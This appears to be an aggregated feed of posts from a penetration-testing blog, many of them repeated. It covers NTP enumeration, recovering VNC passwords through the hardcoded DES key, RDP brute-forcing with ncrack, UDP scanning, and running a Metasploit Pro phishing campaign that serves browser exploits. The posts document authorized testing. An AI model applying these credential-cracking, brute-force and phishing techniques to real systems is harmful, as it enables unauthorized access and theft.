remote address port local address count m ver code avgint lstint
===============================================================================
computerville.wxy.suk.de 123 192.168.1.60 6832 4 4
90 1044 476

chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60
system peer: computerville.wxy.suk.de
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: [1.2.3.102]
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s

chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60
client computerville.wxy.suk.de

chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60
remote local st poll reach delay offset disp
=======================================================================
*computerville.wxy.suk 192.168.1.60 2 1024 377 0.03532 -0.000702 0.13974

chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60
address mask count flags
=====================================================================
0.0.0.0 0.0.0.0 6846 nomodify, nopeer
some-domain 255.255.255.255 0 none
some-domain 255.255.255.255 0 ignore
osafs.org 255.255.255.255 0 ignore
:: :: 0 nomodify, nopeer
ip6-localhost ffff:ffff:ffff: 0 ignore
fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore
Tags: ntpq notbt ntpdc fri pentest ntp

March 15, 2011
19:49
VNC passwords and Metasploit and DES
» ‎ carnal0wnage.attackresearch.com

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section
-->
read more

Tags:
19:32
VNC passwords and Metasploit and DES
» ‎ carnal0wnage.attackresearch.com

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass

or use this one
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.
Tags:

19:32
VNC passwords and Metasploit and DES
» ‎ Carnal0wnage

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass

or use this one
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.
Tags: vnc run des open-source-code metasploit relevant-section vnc

February 09, 2011
15:53
move over tsgrinder/tscrack hello ncrack!
» ‎ carnal0wnage.attackresearch.com

So thanks to mubix for telling me that ncrack now supports RDP. very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST

rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
-->
read more

Tags:
15:41
move over tsgrinder/tscrack hello ncrack!
» ‎ carnal0wnage.attackresearch.com

So thanks to mubix for telling me that ncrack now supports RDP. very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST

rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...

Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)
Tags:

15:41
move over tsgrinder/tscrack hello ncrack!
» ‎ Carnal0wnage

So thanks to mubix for telling me that ncrack now supports RDP. very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST

rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...

Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)
Tags: ncrack eid administrator parallelism tscrack Pentesting

January 26, 2011
8:34
Reactions to comments from Val's post #1
» ‎ carnal0wnage.attackresearch.com

received this comment to Val's post

"Submitted by Anonymous on Tue, 01/04/2011 - 09:33.
The problem with pentesters phishing ...
The problem with pentesters phishing ... is that it does more harm then good for the organization. Without the education piece following a phish, you setup the organization to ban the practice."
Phishing and client-side attacks have been going on for far too long to not allow your testers to use them during test.**

So on one hand you are correct, every phishing exercise done either by an internal team, pentester, or attacker should be followed by an education piece by your internal security/IT team. Every phishing attack is an opportunity to retrain users.

On the other other hand, its how people get in. To broadly call it useless because 1. you are too lazy to educate your users after the fact or 2. didn't think ahead enough to require the PT shop to leave you with education materials or follow up the phish with an education piece doesn't mean it lacks value.

Like I mentioned in the previous post, you need to know how you are going to stand up in realistic scenarios. Does one client-side 0day leave your whole network open to all sorts of badness? you need to know.

**This is assuming that the company's maturity level supports doing a phishing exercise. If your internal security just plain sucks, then you could probably win the argument that no phishing should be conducted but I would counter with why are you getting a Pentest in the first place if things are that bad. Use those consulting dollars to have the consultant help you with your risk plan, internal vulnerability scanning/patching program, workstation/server hardening or teaching you how to scan your internal assets yourself. To steal a Nickerson analogy..."how do you know you can put up a fight if you cant take punch" BUT that doesnt mean you start out getting your ass kicked by starting training with [INSERT MMA BADASS HERE] instead of working your way up.
Tags:

8:34
Reactions to comments from Val's post #1
» ‎ Carnal0wnage

received this comment to Val's post

"Submitted by Anonymous on Tue, 01/04/2011 - 09:33.
The problem with pentesters phishing ...
The problem with pentesters phishing ... is that it does more harm then good for the organization. Without the education piece following a phish, you setup the organization to ban the practice."
Phishing and client-side attacks have been going on for far too long to not allow your testers to use them during test.**

So on one hand you are correct, every phishing exercise done either by an internal team, pentester, or attacker should be followed by an education piece by your internal security/IT team. Every phishing attack is an opportunity to retrain users.

On the other other hand, its how people get in. To broadly call it useless because 1. you are too lazy to educate your users after the fact or 2. didn't think ahead enough to require the PT shop to leave you with education materials or follow up the phish with an education piece doesn't mean it lacks value.

Like I mentioned in the previous post, you need to know how you are going to stand up in realistic scenarios. Does one client-side 0day leave your whole network open to all sorts of badness? you need to know.

**This is assuming that the company's maturity level supports doing a phishing exercise. If your internal security just plain sucks, then you could probably win the argument that no phishing should be conducted but I would counter with why are you getting a Pentest in the first place if things are that bad. Use those consulting dollars to have the consultant help you with your risk plan, internal vulnerability scanning/patching program, workstation/server hardening or teaching you how to scan your internal assets yourself. To steal a Nickerson analogy..."how do you know you can put up a fight if you cant take punch" BUT that doesnt mean you start out getting your ass kicked by starting training with [INSERT MMA BADASS HERE] instead of working your way up.
Tags: piece education post internal-assets realistic-scenarios maturity-level opinion

January 25, 2011
11:38
Reactions to comments from Val's post #1
» ‎ carnal0wnage.attackresearch.com

received this comment to Val's post

"Submitted by Anonymous on Tue, 01/04/2011 - 09:33.
The problem with pentesters phishing ...
The problem with pentesters phishing ... is that it does more harm then good for the organization. Without the education piece following a phish, you setup the organization to ban the practice."
-->
read more

Tags:
January 24, 2011
18:43
Training Like You Fight
» ‎ carnal0wnage.attackresearch.com

One of my favorite talks from this year's BlackHat DC was Ryan Kazanciyan's & Sean Coyne's "The Getaway" talk on data exfiltration.

whitepaper:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-wp.pdf
slides:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-Slides.pdf

Everyone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:
-->
read more

Tags:
6:02
Training Like You Fight
» ‎ carnal0wnage.attackresearch.com

One of my favorite talks from this year's BlackHat DC was Ryan Kazanciyan's & Sean Coyne's "The Getaway" talk on data exfiltration.

whitepaper:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-wp.pdf
slides:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-Slides.pdf

Everyone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:
1. could your pentest shop emulate an attacker of the level in the case studies.
2. did you or they try to scope the test in order to test things like this...aka do a Full Scope test.
3. if you aren't letting your pentesters go after your network like this how do you think YOUR network will hold up against someone that knows what they are doing?

If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?

We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess and you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook and 2. train like you fight, open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.

Instead of making your testers "test' that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed...ask, make, force, them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.

Train like you fight.
Tags:

6:02
Training Like You Fight
» ‎ Carnal0wnage

One of my favorite talks from this year's BlackHat DC was Ryan Kazanciyan's & Sean Coyne's "The Getaway" talk on data exfiltration.

whitepaper:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-wp.pdf
slides:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-Slides.pdf

Everyone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:
1. could your pentest shop emulate an attacker of the level in the case studies.
2. did you or they try to scope the test in order to test things like this...aka do a Full Scope test.
3. if you aren't letting your pentesters go after your network like this how do you think YOUR network will hold up against someone that knows what they are doing?

If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?

We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess and you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook and 2. train like you fight, open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.

Instead of making your testers "test' that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed...ask, make, force, them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.

Train like you fight.
Tags: case test scope ryan-kazanciyan sean-coyne network-segmentation penetration-testers script-kiddies Pentesting

January 09, 2011
8:37
Installing Unicornscan on a current Ubuntu Distro
» ‎ carnal0wnage.attackresearch.com

So get unicornscan from here :

http://unicornscan.org/ -- current version I could find is 0.4.7

you'll need some depenedencies

apt-get install flex bison

apt-get install libpcap0.8-dev libgeoip-dev libltdl3-dev libdumbnet1 libdumbnet-dev

* you may need texlive-extra-utils if you are on a headless system like slicehost or linode, otherwise it will bomb out when it tries to make the documentation :-(

apt-get install texlive-extra-utils

Fix up weird lib issues see at the bottom for where i got this:

blah@blah:$ sudo ln -s /usr/include/dumbnet.h /usr/include/dnet.h

blah@blah:$ for i in `find ./ -type f -exec grep -l 'ldnet' '{}' \;`; do sed -i bak -e 's/ldnet/ldumbnet/g' $i; done

apply this patch

https://www.pentoo.ch/pentoo/browser/portage/trunk/net-analyzer/unicornscan/files/unicornscan-0.4.7-configure.patch

./configure CFLAGS=-D_GNU_SOURCE
make
make install

after that it woud compile and run.

I did have to really crank down the pps to get it to actually run, default is 300 i had to use around 75-100

sudo unicornscan -m U -Ir 75 --show-errors -v externalrange.net/24

Lets test ...

host #1

sudo unicornscan -m U -Ir 75 -v 192.168.1.143

adding 192.168.1.143/32 mode `UDPscan' ports `7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831' pps 75
using interface(s) eth0

UDP open domain[ 53] from 192.168.1.143 ttl 50
UDP open netbios-ns[ 137] from 192.168.1.143 ttl 50
UDP open unknown[51468] from 192.168.1.143 ttl 50

msf auxiliary(udp_sweep) > run

[*] Sending 10 probes to 192.168.1.143->192.168.1.143 (1 hosts)
[*] Discovered NTP on 192.168.1.143:123 (NTP v4)
[*] Discovered NetBIOS on 192.168.1.143:137 (INEEDAFW01::U :INEEDAFW01::U :INEEDAFW01::U :__MSBROWSE__::G :WORKGROUP::U :WORKGROUP::G :WORKGROUP::G :00:00:00:00:00:00)
[*] Discovered DNS on 192.168.1.143:53 (BIND 9.4.2-P2)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sudo nmap -sU 192.168.1.143
PORT STATE SERVICE
53/udp open domain
69/udp openfiltered tftp
123/udp open ntp
137/udp open netbios-ns
138/udp openfiltered netbios-dgm

*took approx 13 min for results

Host #2

sudo unicornscan -m U -Ir 75 -v 192.168.1.94
UDP open sunrpc[ 111] from 192.168.1.94 ttl 50
UDP open shilp[ 2049] from 192.168.1.94 ttl 50

msf auxiliary(udp_sweep) > run

[*] Sending 10 probes to 192.168.1.94->192.168.1.94 (1 hosts)
[*] Discovered Portmap on 192.168.1.94:111 (100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(35483), 100024 v1 TCP(34855), 100003 v2 UDP(2049), 100003 v3 UDP(2049), 100003 v4 UDP(2049), 100021 v1 UDP(51021), 100021 v3 UDP(51021), 100021 v4 UDP(51021), 100003 v2 TCP(2049), 100003 v3 TCP(2049), 100003 v4 TCP(2049), 100021 v1 TCP(32771), 100021 v3 TCP(32771), 100021 v4 TCP(32771), 100005 v1 UDP(54730), 100005 v1 TCP(50729), 100005 v2 UDP(54730), 100005 v2 TCP(50729), 100005 v3 UDP(54730), 100005 v3 TCP(50729))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sudo nmap -sU 192.168.1.94 -v
PORT STATE SERVICE
111/udp open rpcbind
639/udp openfiltered unknown
2049/udp open nfs

*took approx 14 min

Quick notes:
unicornscan sucks for NTP, the metasploit udp_sweep is better even though the port is in the scan list it fails to locate NTP servers

you'll probably want to add some port to the /usr/local/etc/unicornscan/unicorn.conf file in the UDP section, namely 1434,1604,5093,& 523 to be consistent for what metasploit is sending probes for.

you may also want to update the ports list in the above folder to be les stupid as well.

In this case nmap gave consistent results, just took forever

compile stuff from here:
http://itbloggen.se/cs/blogs/olle_lindgren/archive/2009/01/08/unicornscan-on-ubuntu-8-10-intrepid-ibex.aspx?CommentPosted=true#commentmessage

http://geek00l.blogspot.com/2009/01/ubuntu-unicornscan-revisit.html
Tags:

8:37
Installing Unicornscan on a current Ubuntu Distro
» ‎ Carnal0wnage

So get unicornscan from here :

http://unicornscan.org/ -- current version I could find is 0.4.7

you'll need some depenedencies

apt-get install flex bison

apt-get install libpcap0.8-dev libgeoip-dev libltdl3-dev libdumbnet1 libdumbnet-dev

* you may need texlive-extra-utils if you are on a headless system like slicehost or linode, otherwise it will bomb out when it tries to make the documentation :-(

apt-get install texlive-extra-utils

Fix up weird lib issues see at the bottom for where i got this:

blah@blah:$ sudo ln -s /usr/include/dumbnet.h /usr/include/dnet.h

blah@blah:$ for i in `find ./ -type f -exec grep -l 'ldnet' '{}' \;`; do sed -i bak -e 's/ldnet/ldumbnet/g' $i; done

apply this patch

https://www.pentoo.ch/pentoo/browser/portage/trunk/net-analyzer/unicornscan/files/unicornscan-0.4.7-configure.patch

./configure CFLAGS=-D_GNU_SOURCE
make
make install

after that it woud compile and run.

I did have to really crank down the pps to get it to actually run, default is 300 i had to use around 75-100

sudo unicornscan -m U -Ir 75 --show-errors -v externalrange.net/24

Lets test ...

host #1

sudo unicornscan -m U -Ir 75 -v 192.168.1.143

adding 192.168.1.143/32 mode `UDPscan' ports `7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831' pps 75
using interface(s) eth0

UDP open domain[ 53] from 192.168.1.143 ttl 50
UDP open netbios-ns[ 137] from 192.168.1.143 ttl 50
UDP open unknown[51468] from 192.168.1.143 ttl 50

msf auxiliary(udp_sweep) > run

[*] Sending 10 probes to 192.168.1.143->192.168.1.143 (1 hosts)
[*] Discovered NTP on 192.168.1.143:123 (NTP v4)
[*] Discovered NetBIOS on 192.168.1.143:137 (INEEDAFW01::U :INEEDAFW01::U :INEEDAFW01::U :__MSBROWSE__::G :WORKGROUP::U :WORKGROUP::G :WORKGROUP::G :00:00:00:00:00:00)
[*] Discovered DNS on 192.168.1.143:53 (BIND 9.4.2-P2)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sudo nmap -sU 192.168.1.143
PORT STATE SERVICE
53/udp open domain
69/udp openfiltered tftp
123/udp open ntp
137/udp open netbios-ns
138/udp openfiltered netbios-dgm

*took approx 13 min for results

Host #2

sudo unicornscan -m U -Ir 75 -v 192.168.1.94
UDP open sunrpc[ 111] from 192.168.1.94 ttl 50
UDP open shilp[ 2049] from 192.168.1.94 ttl 50

msf auxiliary(udp_sweep) > run

[*] Sending 10 probes to 192.168.1.94->192.168.1.94 (1 hosts)
[*] Discovered Portmap on 192.168.1.94:111 (100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(35483), 100024 v1 TCP(34855), 100003 v2 UDP(2049), 100003 v3 UDP(2049), 100003 v4 UDP(2049), 100021 v1 UDP(51021), 100021 v3 UDP(51021), 100021 v4 UDP(51021), 100003 v2 TCP(2049), 100003 v3 TCP(2049), 100003 v4 TCP(2049), 100021 v1 TCP(32771), 100021 v3 TCP(32771), 100021 v4 TCP(32771), 100005 v1 UDP(54730), 100005 v1 TCP(50729), 100005 v2 UDP(54730), 100005 v2 TCP(50729), 100005 v3 UDP(54730), 100005 v3 TCP(50729))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sudo nmap -sU 192.168.1.94 -v
PORT STATE SERVICE
111/udp open rpcbind
639/udp openfiltered unknown
2049/udp open nfs

*took approx 14 min

Quick notes:
unicornscan sucks for NTP, the metasploit udp_sweep is better even though the port is in the scan list it fails to locate NTP servers

you'll probably want to add some port to the /usr/local/etc/unicornscan/unicorn.conf file in the UDP section, namely 1434,1604,5093,& 523 to be consistent for what metasploit is sending probes for.

you may also want to update the ports list in the above folder to be les stupid as well.

In this case nmap gave consistent results, just took forever

compile stuff from here:
http://itbloggen.se/cs/blogs/olle_lindgren/archive/2009/01/08/unicornscan-on-ubuntu-8-10-intrepid-ibex.aspx?CommentPosted=true#commentmessage

http://geek00l.blogspot.com/2009/01/ubuntu-unicornscan-revisit.html
Tags: blah-blah sweep-run exec-grep unicornscan

8:10
Installing Unicornscan on a current Ubuntu Distro
» ‎ carnal0wnage.attackresearch.com

So get unicornscan from here :

http://unicornscan.org/ -- current version I could find is 0.4.7

you'll need some depenedencies

apt-get install flex bison

apt-get install libpcap0.8-dev libgeoip-dev libltdl3-dev libdumbnet1 libdumbnet-dev

* you may need texlive-extra-utils if you are on a headless system like slicehost or linode, otherwise it will bomb out when it tries to make the documentation :-(

apt-get install texlive-extra-utils

Fix up weird lib issues see at the bottom for where i got this:

blah@blah:$ sudo ln -s /usr/include/dumbnet.h /usr/include/dnet.h
-->
read more

Tags:
December 17, 2010
12:38
Metasploit and VNC Password Bruteforcing
» ‎ carnal0wnage.attackresearch.com

You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.

This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.

So the scenario is you find yourself on the other end of a VNC server.

-->
read more

Tags:
12:24
Metasploit and VNC Password Bruteforcing
» ‎ carnal0wnage.attackresearch.com

You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.

This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.

So the scenario is you find yourself on the other end of a VNC server.

Its tedious to password guess like this

Instead let's use the metasploit module

and throw a dictionary attack against the VNC server

Looks like the VNC no auth module had been ported and stuck in there too :-)

-CG
Tags:

12:24
Metasploit and VNC Password Bruteforcing
» ‎ Carnal0wnage

You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.

This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.

So the scenario is you find yourself on the other end of a VNC server.

Its tedious to password guess like this

Instead let's use the metasploit module

and throw a dictionary attack against the VNC server

Looks like the VNC no auth module had been ported and stuck in there too :-)

-CG
Tags: vnc password metasploit vnc-server dictionary-attack vnc

December 16, 2010
18:37
Conducting a Phishing Campaign in Metasploit Pro
» ‎ carnal0wnage.attackresearch.com

So new job gets me new fun toys. Figured i'd try the fancy shmancy tools and do a phish campaign with metasploit pro.

1. Go click on campaigns and star filling stuff out like what you want to call it

-->
read more

Tags:
14:56
Conducting a Phishing Campaign in Metasploit Pro
» ‎ carnal0wnage.attackresearch.com

So new job gets me new fun toys. Figured i'd try the fancy shmancy tools and do a phish campaign with metasploit pro.

1. Go click on campaigns and star filling stuff out like what you want to call it

2. Set up your web campaign. With the web campaign you can actually host a webpage along with your exploit instead of just getting the typical "please wait" stuff.

3. Fill out your name of the template and the html of what you want it to say

4. By default it will run browser autopwn

5. Lets just pick an exploit to throw at them instead of all of them

6. Once you click save, it should look something like this:

7. After that you can set up the email portion of the phish

8. Fill out the sending server options

9. Then fill out the text for the body of your email

10. After you click save, you'll go to the add email addresses section where you can import a list, or type them in

11. Kinda looks like this when its all filled out. To start click the start campaign button

12. You can see the status of your sent emails and as people click them the percentage will change

13. I guess what the email could look like if you werent trying too hard :-)

14. And the web page serving up the exploit

15. You can now see that a user clicked the link and our percentage has changed

I'll cover hosts and sessions later. Only gripe is the lack of configuration ability in the exploit payload section. I've been told this will be addressed shortly even though a lot of work has been put into smart defaults the ability to change it when necessary would be nice.

-CG
Tags:

14:56
Conducting a Phishing Campaign in Metasploit Pro
» ‎ Carnal0wnage

So new job gets me new fun toys. Figured i'd try the fancy shmancy tools and do a phish campaign with metasploit pro.

1. Go click on campaigns and star filling stuff out like what you want to call it

2. Set up your web campaign. With the web campaign you can actually host a webpage along with your exploit instead of just getting the typical "please wait" stuff.

3. Fill out your name of the template and the html of what you want it to say

4. By default it will run browser autopwn

5. Lets just pick an exploit to throw at them instead of all of them

6. Once you click save, it should look something like this:

7. After that you can set up the email portion of the phish

8. Fill out the sending server options

9. Then fill out the text for the body of your email

10. After you click save, you'll go to the add email addresses section where you can import a list, or type them in

11. Kinda looks like this when its all filled out. To start click the start campaign button

12. You can see the status of your sent emails and as people click them the percentage will change

13. I guess what the email could look like if you werent trying too hard :-)

14. And the web page serving up the exploit

15. You can now see that a user clicked the link and our percentage has changed

I'll cover hosts and sessions later. Only gripe is the lack of configuration ability in the exploit payload section. I've been told this will be addressed shortly even though a lot of work has been put into smart defaults the ability to change it when necessary would be nice.

-CG
Tags: click email campaign web-campaign fancy-shmancy addresses-section phishing

November 08, 2010
6:54
Tethering Your Droid to a Linux System
» ‎ carnal0wnage.attackresearch.com

Image my happiness with i got the droid update and saw usb tethering available.

Then image my sadness-->rage that VendorX wants to charge to charge another 15 bucks to tether.

so following the instructions from here it is possible to tether via USB on linux. Evidently PDAnet works great but i dont use windows cept for powerpoint and i cant afford a mac.

so here's how to get it going if you dont want to click the link...plus i'll never remember that URL.

install proxoid on your droid

download & extract the android sdk to your linux system

turn on android usb debugging -->application-->development-->usb debugging

turn on proxoid

connect usb

cg@c0:~$ cd android-sdk-linux_86/tools/

cg@c0:~/android-sdk-linux_86/tools$ sudo ./adb start-server

cg@c0t:~/android-sdk-linux_86/tools$ ./adb forward tcp:8080 tcp:8080

set your FireFox network settings to use localhost 8080 and you can surf. You should also be able to set your whole system to go thru the droid as well if you set the system wide network proxy.
Tags:

6:54
Tethering Your Droid to a Linux System
» ‎ Carnal0wnage

Image my happiness with i got the droid update and saw usb tethering available.

Then image my sadness-->rage that VendorX wants to charge to charge another 15 bucks to tether.

so following the instructions from here it is possible to tether via USB on linux. Evidently PDAnet works great but i dont use windows cept for powerpoint and i cant afford a mac.

so here's how to get it going if you dont want to click the link...plus i'll never remember that URL.

install proxoid on your droid

download & extract the android sdk to your linux system

turn on android usb debugging -->application-->development-->usb debugging

turn on proxoid

connect usb

cg@c0:~$ cd android-sdk-linux_86/tools/

cg@c0:~/android-sdk-linux_86/tools$ sudo ./adb start-server

cg@c0t:~/android-sdk-linux_86/tools$ ./adb forward tcp:8080 tcp:8080

set your FireFox network settings to use localhost 8080 and you can surf. You should also be able to set your whole system to go thru the droid as well if you set the system wide network proxy.
Tags: droid usb linux network-proxy linux-system android

November 06, 2010
7:38
Adobe XML Injection Metasploit Module
» ‎ carnal0wnage.attackresearch.com

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple adobe products including: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and
8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data
Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

References Here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3960
http://www.osvdb.org/62292
http://www.securityfocus.com/bid/38197
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_...
http://www.adobe.com/support/security/bulletins/apsb10-05.html

I recommend you read security-asessment's pdf on it, its good.

Anyway, its a cool bug.
-->
read more

Tags:
5:57
Adobe XML Injection Metasploit Module
» ‎ carnal0wnage.attackresearch.com

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple adobe products including: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and
8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data
Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

References Here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3960
http://www.osvdb.org/62292
http://www.securityfocus.com/bid/38197
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.adobe.com/support/security/bulletins/apsb10-05.html

I recommend you read security-asessment's pdf on it, its good.

Anyway, its a cool bug.
1 -->because it affects several products although most people have probably never heard of most of them except for ColdFusion.
